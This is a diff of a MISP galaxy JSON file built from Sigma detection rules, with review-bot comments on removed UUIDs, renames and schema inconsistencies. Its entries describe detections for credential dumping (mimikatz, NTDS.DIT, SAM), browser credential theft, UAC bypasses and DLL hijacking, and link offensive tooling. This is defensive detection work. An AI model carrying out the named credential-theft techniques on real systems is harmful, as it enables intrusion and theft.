"https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs",
"https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
- "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml"
],
"tags": [
@@ -37026,8 +36997,8 @@
"logsource.product": "windows",
"refs": [
"https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
- "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw",
"https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g",
+ "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"
],
"tags": [
@@ -37051,9 +37022,9 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
"https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html",
"https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html",
+ "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml"
],
"tags": [
@@ -37126,8 +37097,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/outflanknl/Dumpert",
"https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/",
+ "https://github.com/outflanknl/Dumpert",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_dumpert.yml"
],
"tags": [
@@ -37194,8 +37165,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
"https://github.com/Porchetta-Industries/CrackMapExec",
+ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml"
],
"tags": [
@@ -37248,6 +37219,40 @@
"uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377",
"value": "Anydesk Temporary Artefact"
},
+ {
+ "description": "Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Some false positives may occur with legitimate renamed process monitor binaries"
+ ],
+ "filename": "file_event_win_sysinternals_procmon_driver_susp_creation.yml",
+ "level": "medium",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1068"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "a05baa88-e922-4001-bc4d-8738135f27de",
+ "value": "Process Monitor Driver Creation By Non-Sysinternals Binary"
+ },
{
"description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.",
"meta": {
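Review bot: the tag list carries attack.persistence next to attack.privilege_escalation, but the only related technique is T1068 (dest-uuid b21c3b2d-02e6-45b1-980b-e69051040839), a privilege-escalation technique; either add the persistence technique this rule is meant to cover or drop the persistence tactic tag so tags and related stay consistent. The same non-URL "Internal Research" string appears in refs here as well.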
@@ -37261,8 +37266,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/",
"https://cobalt.io/blog/kerberoast-attack-techniques",
+ "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml"
],
"tags": [
@@ -37295,8 +37300,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py",
"https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/",
+ "https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml"
],
"tags": [
@@ -37446,8 +37451,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml"
],
"tags": [
@@ -37547,8 +37552,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/12",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml"
],
"tags": [
@@ -37603,43 +37608,7 @@
"value": "UAC Bypass Using NTFS Reparse Point - File"
},
{
- "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/03/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_ntds_dit.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
- "https://pentestlab.blog/tag/ntds-dit/",
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d",
- "value": "Suspicious NTDS.DIT Creation"
- },
- {
- "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration",
+ "description": "Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.",
"meta": {
"author": "Florian Roth (Nextron Systems)",
"creation_date": "2022/03/11",
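Review bot: the entry with uuid 4e7050dd-e548-483f-b7d6-527ab4fa784d ("Suspicious NTDS.DIT Creation") is deleted outright rather than kept as a deprecated cluster; MISP tags already applied with that cluster UUID will stop resolving. If the upstream rule was retired or replaced, a tombstone entry, or at least the replacement UUID named in the commit message, would preserve the link for existing events.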
@@ -37671,7 +37640,7 @@
}
],
"uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a",
- "value": "Suspicious NTDS Exfil Filename Patterns"
+ "value": "NTDS Exfiltration Filename Patterns"
},
{
"description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n",
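Review bot: renaming the value from "Suspicious NTDS Exfil Filename Patterns" to "NTDS Exfiltration Filename Patterns" keeps uuid 3a8da4e0-36c1-40d2-8b29-b3e890d5172a, but galaxy tag names are built from the value string, so events tagged under the old name will no longer match the new one; worth calling out in the changelog alongside the UUID removals.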
@@ -37710,8 +37679,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20",
"https://twitter.com/vanitasnk/status/1437329511142420483?s=21",
+ "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml"
],
"tags": [
@@ -37869,11 +37838,11 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/search?q=CVE-2021-36934",
- "https://www.google.com/search?q=%22reg.exe+save%22+sam",
- "https://github.com/FireFart/hivenightmare",
"https://github.com/HuskyHacks/ShadowSteal",
+ "https://github.com/search?q=CVE-2021-36934",
+ "https://github.com/FireFart/hivenightmare",
"https://github.com/cube0x0/CVE-2021-36934",
+ "https://www.google.com/search?q=%22reg.exe+save%22+sam",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml"
],
"tags": [
@@ -37893,40 +37862,6 @@
"uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0",
"value": "Potential SAM Database Dump"
},
- {
- "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/05/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_moriya_rootkit.yml",
- "level": "critical",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1543.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88",
- "value": "Moriya Rootkit"
- },
{
"description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)",
"meta": {
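Review bot: this drops the "Moriya Rootkit" cluster (uuid a1507d71-0b60-44f6-b17c-bf53220fdd88) entirely, and the same happens to several other threat-specific entries further down in this patch (VHD download from browser, Pingback backdoor, 3CX beaconing, Office directory traversal, Dtrack); if those rules were relocated upstream rather than retired, the generator should follow them to their new location, otherwise existing cluster references to these UUIDs break with no deprecation marker.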
@@ -38062,41 +37997,6 @@
"uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8",
"value": "UAC Bypass Abusing Winsat Path Parsing - File"
},
- {
- "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n",
- "meta": {
- "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'",
- "creation_date": "2021/10/25",
- "falsepositive": [
- "Legitimate downloads of \".vhd\" files would also trigger this"
- ],
- "filename": "file_event_win_mal_vhd_download.yml",
- "level": "medium",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/intelligence-insights-october-2021/",
- "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml"
- ],
- "tags": [
- "attack.resource_development",
- "attack.t1587.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8468111a-ef07-4654-903b-b863a80bbc95",
- "value": "Suspicious VHD Image Download From Browser"
- },
{
"description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents",
"meta": {
@@ -38200,8 +38100,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc",
+ "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml"
],
"tags": [
@@ -38311,6 +38211,39 @@
"uuid": "52753ea4-b3a0-4365-910d-36cff487b789",
"value": "Hijack Legit RDP Session to Move Laterally"
},
+ {
+ "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database)",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "file_event_win_ntds_dit_creation.yml",
+ "level": "low",
+ "logsource.category": "file_event",
+ "logsource.product": "windows",
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "0b8baa3f-575c-46ee-8715-d6f28cc7d33c",
+ "value": "NTDS.DIT Created"
+ },
{
"description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence",
"meta": {
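Review bot: this new "NTDS.DIT Created" entry covers the same file name as the "Suspicious NTDS.DIT Creation" cluster removed earlier in this patch (uuid 4e7050dd-e548-483f-b7d6-527ab4fa784d), but under a fresh uuid 0b8baa3f-575c-46ee-8715-d6f28cc7d33c and at level "low" instead of "high"; if it is the intended successor, reference the old UUID (or keep the old entry as deprecated) so tags can migrate, and mention the severity drop in the commit message.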
@@ -38348,8 +38281,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63",
"https://github.com/GhostPack/SafetyKatz",
+ "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml"
],
"tags": [
@@ -38564,8 +38497,8 @@
"logsource.product": "windows",
"refs": [
"https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/",
- "https://github.com/fox-it/LDAPFragger",
"https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
+ "https://github.com/fox-it/LDAPFragger",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml"
],
"tags": [
@@ -38632,8 +38565,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://aboutdfir.com/the-key-to-identify-psexec/",
"https://twitter.com/davisrichardg/status/1616518800584704028",
+ "https://aboutdfir.com/the-key-to-identify-psexec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_psexec_service_key.yml"
],
"tags": [
@@ -38720,8 +38653,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml"
],
"tags": [
@@ -38896,8 +38829,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_created.yml"
],
"tags": [
@@ -38930,8 +38863,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens",
+ "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml"
],
"tags": [
@@ -39164,12 +39097,12 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc",
- "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
- "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
"https://github.com/Wh04m1001/SysmonEoP",
+ "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/",
"https://decoded.avast.io/martinchlumecky/png-steganography/",
"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
+ "https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc",
+ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml"
],
"tags": [
@@ -39320,8 +39253,8 @@
"logsource.category": "file_event",
"logsource.product": "windows",
"refs": [
- "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://twitter.com/cyb3rops/status/1552932770464292864",
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml"
],
"tags": [
@@ -39343,40 +39276,6 @@
"uuid": "b6f91281-20aa-446a-b986-38a92813a18f",
"value": "DLL Search Order Hijackig Via Additional Space in Path"
},
- {
- "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/05/05",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "file_event_win_malware_pingback_backdoor.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
- "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_malware_pingback_backdoor.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1574.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78",
- "value": "Pingback Backdoor File Indicators"
- },
{
"description": "Detects the creation of tasks from processes executed from suspicious locations",
"meta": {
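Review bot: the unchanged value at the top of this hunk, "DLL Search Order Hijackig Via Additional Space in Path", carries an upstream typo ("Hijackig"); since value strings become tag names, it should be fixed in the Sigma rule title and regenerated rather than patched by hand in this file.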
@@ -39458,8 +39357,8 @@
"logsource.category": "file_rename",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/ffforward/status/1481672378639912960",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location",
+ "https://twitter.com/ffforward/status/1481672378639912960",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml"
],
"tags": "No established tags"
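Review bot: "tags": "No established tags" is a string here while every other entry in this file uses an array for tags, so consumers iterating over tags will break on this entry; the generator should emit an empty list (or omit the key) when the upstream rule declares no tags.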
@@ -39921,8 +39820,8 @@
"logsource.category": "file_access",
"logsource.product": "windows",
"refs": [
- "https://github.com/lclevy/firepwd",
"https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users",
+ "https://github.com/lclevy/firepwd",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml"
],
"tags": [
@@ -39955,8 +39854,8 @@
"logsource.category": "file_access",
"logsource.product": "windows",
"refs": [
- "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist",
"https://www.passcape.com/windows_password_recovery_dpapi_credhist",
+ "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml"
],
"tags": [
@@ -40055,8 +39954,8 @@
"logsource.category": "dns_query",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/notwhickey/status/1333900137232523264",
"https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/",
+ "https://twitter.com/notwhickey/status/1333900137232523264",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml"
],
"tags": [
@@ -40155,10 +40054,10 @@
"logsource.category": "dns_query",
"logsource.product": "windows",
"refs": [
- "https://redcanary.com/blog/misbehaving-rats/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows",
+ "https://redcanary.com/blog/misbehaving-rats/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml"
],
"tags": [
@@ -40191,8 +40090,8 @@
"logsource.category": "dns_query",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/",
"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/",
+ "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"
],
"tags": [
@@ -40254,29 +40153,6 @@
"uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b",
"value": "DNS Query for Ufile.io Upload Domain - Sysmon"
},
- {
- "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "dns_query_win_malware_3cx_compromise.yml",
- "level": "high",
- "logsource.category": "dns_query",
- "logsource.product": "windows",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_malware_3cx_compromise.yml"
- ],
- "tags": [
- "attack.command_and_control"
- ]
- },
- "uuid": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8",
- "value": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS"
- },
{
"description": "Detects DNS queries for subdomains used for upload to MEGA.io",
"meta": {
@@ -40424,9 +40300,9 @@
"logsource.category": "dns_query",
"logsource.product": "windows",
"refs": [
+ "https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update",
"https://www.virustotal.com/gui/file/d5661009c461a8b20e1ad22f48609cc84dd90aee9182e026659dde4d46aaf25e/relations",
"https://www.virustotal.com/gui/file/0e2854753d17b1bb534de8e765d5813c9fb584a745978b3d92bc6ca78e3e7735/relations",
- "https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-update",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_malware_socgholish_second_stage_c2.yml"
],
"tags": [
@@ -40786,8 +40662,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
"https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings",
+ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml"
],
"tags": [
@@ -40807,32 +40683,6 @@
"uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac",
"value": "Suspicious Service DACL Modification Via Set-Service Cmdlet"
},
- {
- "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)",
- "meta": {
- "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)",
- "creation_date": "2022/06/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190",
- "https://twitter.com/sbousseaden/status/1531653369546301440",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion"
- ]
- },
- "uuid": "868955d9-697e-45d4-a3da-360cefd7c216",
- "value": "Potential Exploitation Attempt From Office Application"
- },
{
"description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.",
"meta": {
@@ -40846,9 +40696,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://redcanary.com/threat-detection-report/",
- "https://www.cobaltstrike.com/help-windows-executable",
"https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
+ "https://www.cobaltstrike.com/help-windows-executable",
+ "https://redcanary.com/threat-detection-report/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml"
],
"tags": [
@@ -40881,8 +40731,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend",
"https://twitter.com/0gtweet/status/1638069413717975046",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml"
],
"tags": [
@@ -40939,11 +40789,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
